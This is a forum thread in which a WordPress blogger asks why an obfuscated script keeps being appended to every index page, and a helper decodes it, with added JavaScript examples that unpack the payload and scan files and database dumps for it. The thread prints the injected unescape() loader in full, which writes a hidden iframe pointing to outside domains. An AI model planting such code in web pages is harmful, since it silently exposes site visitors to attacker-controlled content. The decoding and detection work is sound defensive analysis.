
Code inserted into index pages

I've changed everything, but still...

         

m2c1r

11:55 pm on Apr 10, 2008 (gmt 0)

Any help greatly appreciated.

The code looks like this:

<script type='text/javascript'>
<!-- document.writeln(unescape ('%3c%49%...

and it shows up almost every day tagged onto the bottom of all the index pages (theme index, admin index, main index) on my blog site, despite having completely nuked the site (twice) and restarted, upgrading to WP 2.5, changing hosts, changing passwords after eliminating it, and researching it on Google for fixes.

I have been through the WP files looking for extra files compared to the original install, and looked at the database for suspicious entries, but I can't find whatever is making it regenerate. Of course, I am no programmer, so I could easily be missing it.

Can anyone suggest where to look and/or how to finally boot this thing? Thanks,

Matt

httpwebwitch

1:22 am on Apr 11, 2008 (gmt 0)

That looks like the beginning of a highly obfuscated script, which writes the beginning of an HTML tag. If you paste the whole thing in here, I can de-obfuscate it for you and tell you what it does.

m2c1r

6:00 pm on Apr 11, 2008 (gmt 0)

This is the full code:

<
<!--
document.writeln(unescape ('%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%65%65%39%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%66%69%72%73%74%62%6c%75%2e%63%6e%2f%33%2e%70%68%70%3f%36%39%30%35%38%35%30%31%27%20%77%69%64%74%68%3d%39%38%20%68%65%69%67%68%74%3d%31%34%31%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e') );
//-->

I just removed the script tags for safety (if it matters?).

Thanks for the help.

Matt

httpwebwitch

8:28 pm on Apr 11, 2008 (gmt 0)

You're being hacked.
That code is inserting this element onto your page:

<IFRAME name=ee9 src='http://firstblu.cn/3.php?69058501' width=98 height=141 style='display: none'></IFRAME>

Inside that iframe, it's loading "http://firstblu.cn/3.php?69058501". Request that URL, and you get this:


<iframe src="&#104&#116&#116&#112&#58&#47&#47&#102&#105&#114&#115&#116&#115&#108&#97&#115&#104&#46&#99&#110&#47&#112&#97&#114&#107&#47" width=1 height=1 style="visibility: hidden"></iframe>

Oddly, this does nothing, because HTML entities don't resolve in a URL, and anyway the hacker didn't put semicolons after the HTML entity names. Instead of "&#104", they probably intended to write "&#104;"

So at this point, out of curiosity we delve in to figure out what the hacker probably intended... When I add the missing semicolons, it produces this string:


[firstslash.cn...]

So, at the bottom of all this unsuccessful obfuscation, the hacker wanted an iframe to open with that Chinese URL in it. When I request that url, I get an empty page. The trail ends.

I think this may be an expired attempt that was abandoned by the hacker, and now does nothing. The code is still being written on your page, but the resources it used to access are no longer working properly.

Look for any of those URLs and strings in your database, files, etc. Rule out your own system as the cause of the script injection. Then call your ISP, and request that their machines be cleaned, reinstalled, formatted, rebooted. Or switch to a new hosting provider.

I hope this helped!
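The two decoding steps walked through in the reply above, as an added example (this is not code from the original posts): a small Node.js script that applies the percent-decoding unescape() performs to the payload quoted in the thread, then decodes the numeric character references in the second-stage iframe, and pulls the iframe src out of each. One caveat a practitioner should keep in mind when triaging a payload like this: browser HTML parsers accept a numeric character reference inside an attribute value even when the trailing semicolon is missing (it is a recoverable parse error, not a fatal one), so the decoder below treats the semicolon as optional rather than assuming the second stage was inert. The only inputs are the two strings posted in the thread.

```javascript
// Added example, not code from the original posts: unpacks the two layers
// of the injected script quoted in this thread. Stage 1 is the percent-encoded
// string the injected <script> hands to unescape(); stage 2 is the
// numeric-entity string in the iframe that http://firstblu.cn/3.php?69058501
// served back.

// Layer 1: what unescape() does to the %XX and %uXXXX forms.
function decodePercent(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Layer 2: HTML numeric character references (&#NNN; or &#xHH;). The
// semicolon is optional because browser HTML parsers also accept its absence
// in an attribute value, so the missing semicolons in the payload do not by
// themselves neutralise it. Without the semicolon a following digit would be
// swallowed into the number, which is the hacker's problem, not ours.
function decodeNumericEntities(s) {
  return s.replace(/&#(?:x([0-9a-fA-F]+)|([0-9]+));?/g, (_m, hex, dec) =>
    String.fromCodePoint(hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10)));
}

// Pull the src attribute out of the first <iframe> in a fragment, whatever
// quoting style it uses. Returns null when there is no iframe with a src.
function extractIframeSrc(html) {
  const m = /<iframe\b[^>]*\bsrc\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))/i.exec(html);
  if (!m) return null;
  return m[1] !== undefined ? m[1] : m[2] !== undefined ? m[2] : m[3];
}

// The two payloads exactly as quoted in the thread.
const STAGE1 =
  '%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%65%65%39%20' +
  '%73%72%63%3d%27%68%74%74%70%3a%2f%2f%66%69%72%73%74%62%6c%75%2e%63%6e' +
  '%2f%33%2e%70%68%70%3f%36%39%30%35%38%35%30%31%27%20' +
  '%77%69%64%74%68%3d%39%38%20%68%65%69%67%68%74%3d%31%34%31%20' +
  '%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e' +
  '%3c%2f%49%46%52%41%4d%45%3e';

const STAGE2 =
  '<iframe src="&#104&#116&#116&#112&#58&#47&#47&#102&#105&#114&#115&#116&#115' +
  '&#108&#97&#115&#104&#46&#99&#110&#47&#112&#97&#114&#107&#47" width=1 height=1 ' +
  'style="visibility: hidden"></iframe>';

// Walk both hops and return everything recovered along the way.
function unpack() {
  const injectedTag = decodePercent(STAGE1);          // the hidden IFRAME written into the page
  const hop1 = extractIframeSrc(injectedTag);         // what that IFRAME loads
  const secondTag = decodeNumericEntities(STAGE2);    // the iframe hop1 served back, decoded
  const hop2 = extractIframeSrc(secondTag);           // where the second iframe points
  return { injectedTag, hop1, secondTag, hop2 };
}

console.log(unpack());
```

Running it prints the decoded IFRAME from the reply above and the two URLs in the chain. The same two functions cover the usual variants of this family (double-quoted strings, %uXXXX escapes, hexadecimal entities), so they can be pointed at the next sample without changes.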

m2c1r

12:36 am on Apr 12, 2008 (gmt 0)

Thanks for unraveling that. The only thing I can think is that it must be in the MySQL database, because everything else was completely removed and restarted at a new host with all new files downloaded directly from wordpress and using their default theme. So, if I search the database, I want to look for a string like: firstblu.cn and that should point out where the whole piece of code is hiding? Or do I search for it in obfuscated format?

Thanks again for your help. This has been no end of aggravating...

Matt

httpwebwitch

7:34 am on Apr 12, 2008 (gmt 0)

It could be in your database. How large is your database (i.e. how many posts + comments)? Dozens, hundreds, or thousands? I mean, is it reasonable to pore through it manually a row at a time?

Try some wild searches, like:
SELECT * FROM wp_comments WHERE comment_content LIKE '%script%'
SELECT * FROM wp_comments WHERE comment_content LIKE '%first%'

But something is fishy. You say this is showing on all your index pages, including the ADMIN index? The wp-admin folder? That's suspicious. Why would someone's user-entered data show up in the WP admin area?

This makes me wish there was a SQL statement akin to "SEARCH":
SEARCH wp_comments,wp_links,wp_posts FOR '%script%'
But alas, such a thing doesn't exist AFAIK
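A search that decodes before it matches, as an added example (not code from the original posts, and not a claim about where the injection on Matt's site actually lived). It answers the question raised above of whether to search for the plain domain or the obfuscated form by doing both: it takes any text, whether file contents or a mysqldump of all the WordPress tables at once (which covers the cross-table SEARCH the reply above wishes for), finds the document.writeln(unescape('...')) wrapper, decodes the payload and pulls out the iframe src, and separately flags plain-text occurrences of the two domains from the thread. The sample file name, table rows and their contents are constructed for the example.

```javascript
// Added example, not code from the original posts: scans text (file contents,
// or a mysqldump of the WordPress database) for the injection signature seen
// in this thread and decodes what it finds, instead of relying on a plain
// search for the domain name. Sample inputs below are constructed for the
// example; the file name and table rows are assumptions, not Matt's data.

// The percent-encoded payload exactly as quoted in the thread.
const PAYLOAD =
  '%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%65%65%39%20' +
  '%73%72%63%3d%27%68%74%74%70%3a%2f%2f%66%69%72%73%74%62%6c%75%2e%63%6e' +
  '%2f%33%2e%70%68%70%3f%36%39%30%35%38%35%30%31%27%20' +
  '%77%69%64%74%68%3d%39%38%20%68%65%69%67%68%74%3d%31%34%31%20' +
  '%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e' +
  '%3c%2f%49%46%52%41%4d%45%3e';

// What the injected script hands to unescape(): %XX pairs (and %uXXXX).
function decodePercent(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (_m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// The wrapper the injection uses: document.writeln(unescape('<percent-encoded>')),
// with either quote style and any whitespace between the tokens.
const INJECTION =
  /document\.writeln\s*\(\s*unescape\s*\(\s*(['"])((?:%[0-9a-fA-F]{2})+)\1\s*\)\s*\)/g;

// Strings worth searching for in the clear as well (the two domains the
// thread decoded).
const INDICATORS = ['firstblu.cn', 'firstslash.cn'];

// Returns one finding per hit: either the encoded wrapper (decoded, with the
// iframe src pulled out) or a plain-text occurrence of a known indicator.
function scanSource(name, text) {
  const findings = [];
  text.split('\n').forEach((line, i) => {
    for (const m of line.matchAll(INJECTION)) {
      const decoded = decodePercent(m[2]);
      const src = /\bsrc\s*=\s*['"]?([^'"\s>]+)/i.exec(decoded);
      findings.push({ source: name, line: i + 1, kind: 'encoded-payload',
                      src: src ? src[1] : null, decoded });
    }
    for (const ind of INDICATORS) {
      if (line.includes(ind)) {
        findings.push({ source: name, line: i + 1, kind: 'plain-indicator', indicator: ind });
      }
    }
  });
  return findings;
}

// Scan a list of { name, text } sources and flatten the results.
function scanAll(sources) {
  return sources.flatMap(s => scanSource(s.name, s.text));
}

// Constructed samples: a theme index.php with the injection appended after the
// closing PHP tag, and two mysqldump rows (a clean comment and an option row
// carrying the URL unencoded). Names and contents are assumptions.
const SAMPLES = [
  { name: 'wp-content/themes/default/index.php',
    text: '<?php get_footer(); ?>\n' +
          "<script type='text/javascript'>\n<!--\n" +
          "document.writeln(unescape ('" + PAYLOAD + "') );\n" +
          '//-->\n</script>\n' },
  { name: 'blog.sql',
    text: "INSERT INTO `wp_comments` VALUES (12,3,'Alice','a@example.invalid','','127.0.0.1'," +
          "'2008-04-10 11:55:00','2008-04-10 11:55:00','Nice post, thanks!',0,'1','Mozilla/5.0','',0,0);\n" +
          "INSERT INTO `wp_options` VALUES (99,0,'widget_text'," +
          "'<iframe src=http://firstblu.cn/3.php?69058501></iframe>','yes');\n" },
];

console.log(JSON.stringify(scanAll(SAMPLES), null, 2));
```

To use it on a real site, read each file under the web root and the output of mysqldump into { name, text } records and hand them to scanAll. A LIKE '%firstblu.cn%' query only hits rows where the URL is stored in the clear; the payload quoted in this thread carries the domain as %66%69%72%73%74%62%6c%75%2e%63%6e, so a search that neither matches the unescape() wrapper nor decodes first walks straight past it. Which sources the hits come from is itself the useful check: if the encoded wrapper turns up in theme and wp-admin index files but in no row of the dump, the database is not where it is coming from.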

m2c1r

5:16 pm on Apr 12, 2008 (gmt 0)

10+ Year Member



Hi,

I don't know why the script attaches itself to every index page; that goes beyond my level of understanding of this stuff. I can also tell you that in some cases, there will be two insertions, and back when I had two wordpress blogs installed at the same host, one main domain and one add-on, it traveled to both, even though they had different databases.

The only reason I think it must be in the database is because that is the only thing that didn't change; I have about 500 entries between posts/comments, and I didn't want to start from scratch. But, I changed hosts, passwords, and used a completely new wordpress download to install, and I didn't even change from the default theme, as I've read some themes can be compromised. Despite this, I had a new script insertion within 24 hours.

I will try again to look in the database, but here also my skill is pretty limited. I agree- a search function would be great, particularly for someone like me who isn't too tech savvy with this stuff.

Matt

Greven

5:43 pm on Apr 12, 2008 (gmt 0)

Are you the only one that sees this on the pages? It's possible that it is you that has the problem, and not the site.

m2c1r

10:46 pm on Apr 12, 2008 (gmt 0)

I've seen it on about a dozen different computers, because during some of the time I've been dealing with it I was traveling and checking from internet cafes, libraries, etc. So I am certain it is something on the hosting side.

Matt

m2c1r

7:14 pm on Apr 14, 2008 (gmt 0)

I just tried an experiment with this: I created a new blog installation, with no entries, as an add-on to the hosting account (technically I think it is a subdomain with a redirect) with a different password and database and sure enough, within a few hours, the index page had an iframe inserted on the new blog. So I scoured the database, and there was nothing there I could find that shouldn't have been. So, now I am just totally stumped...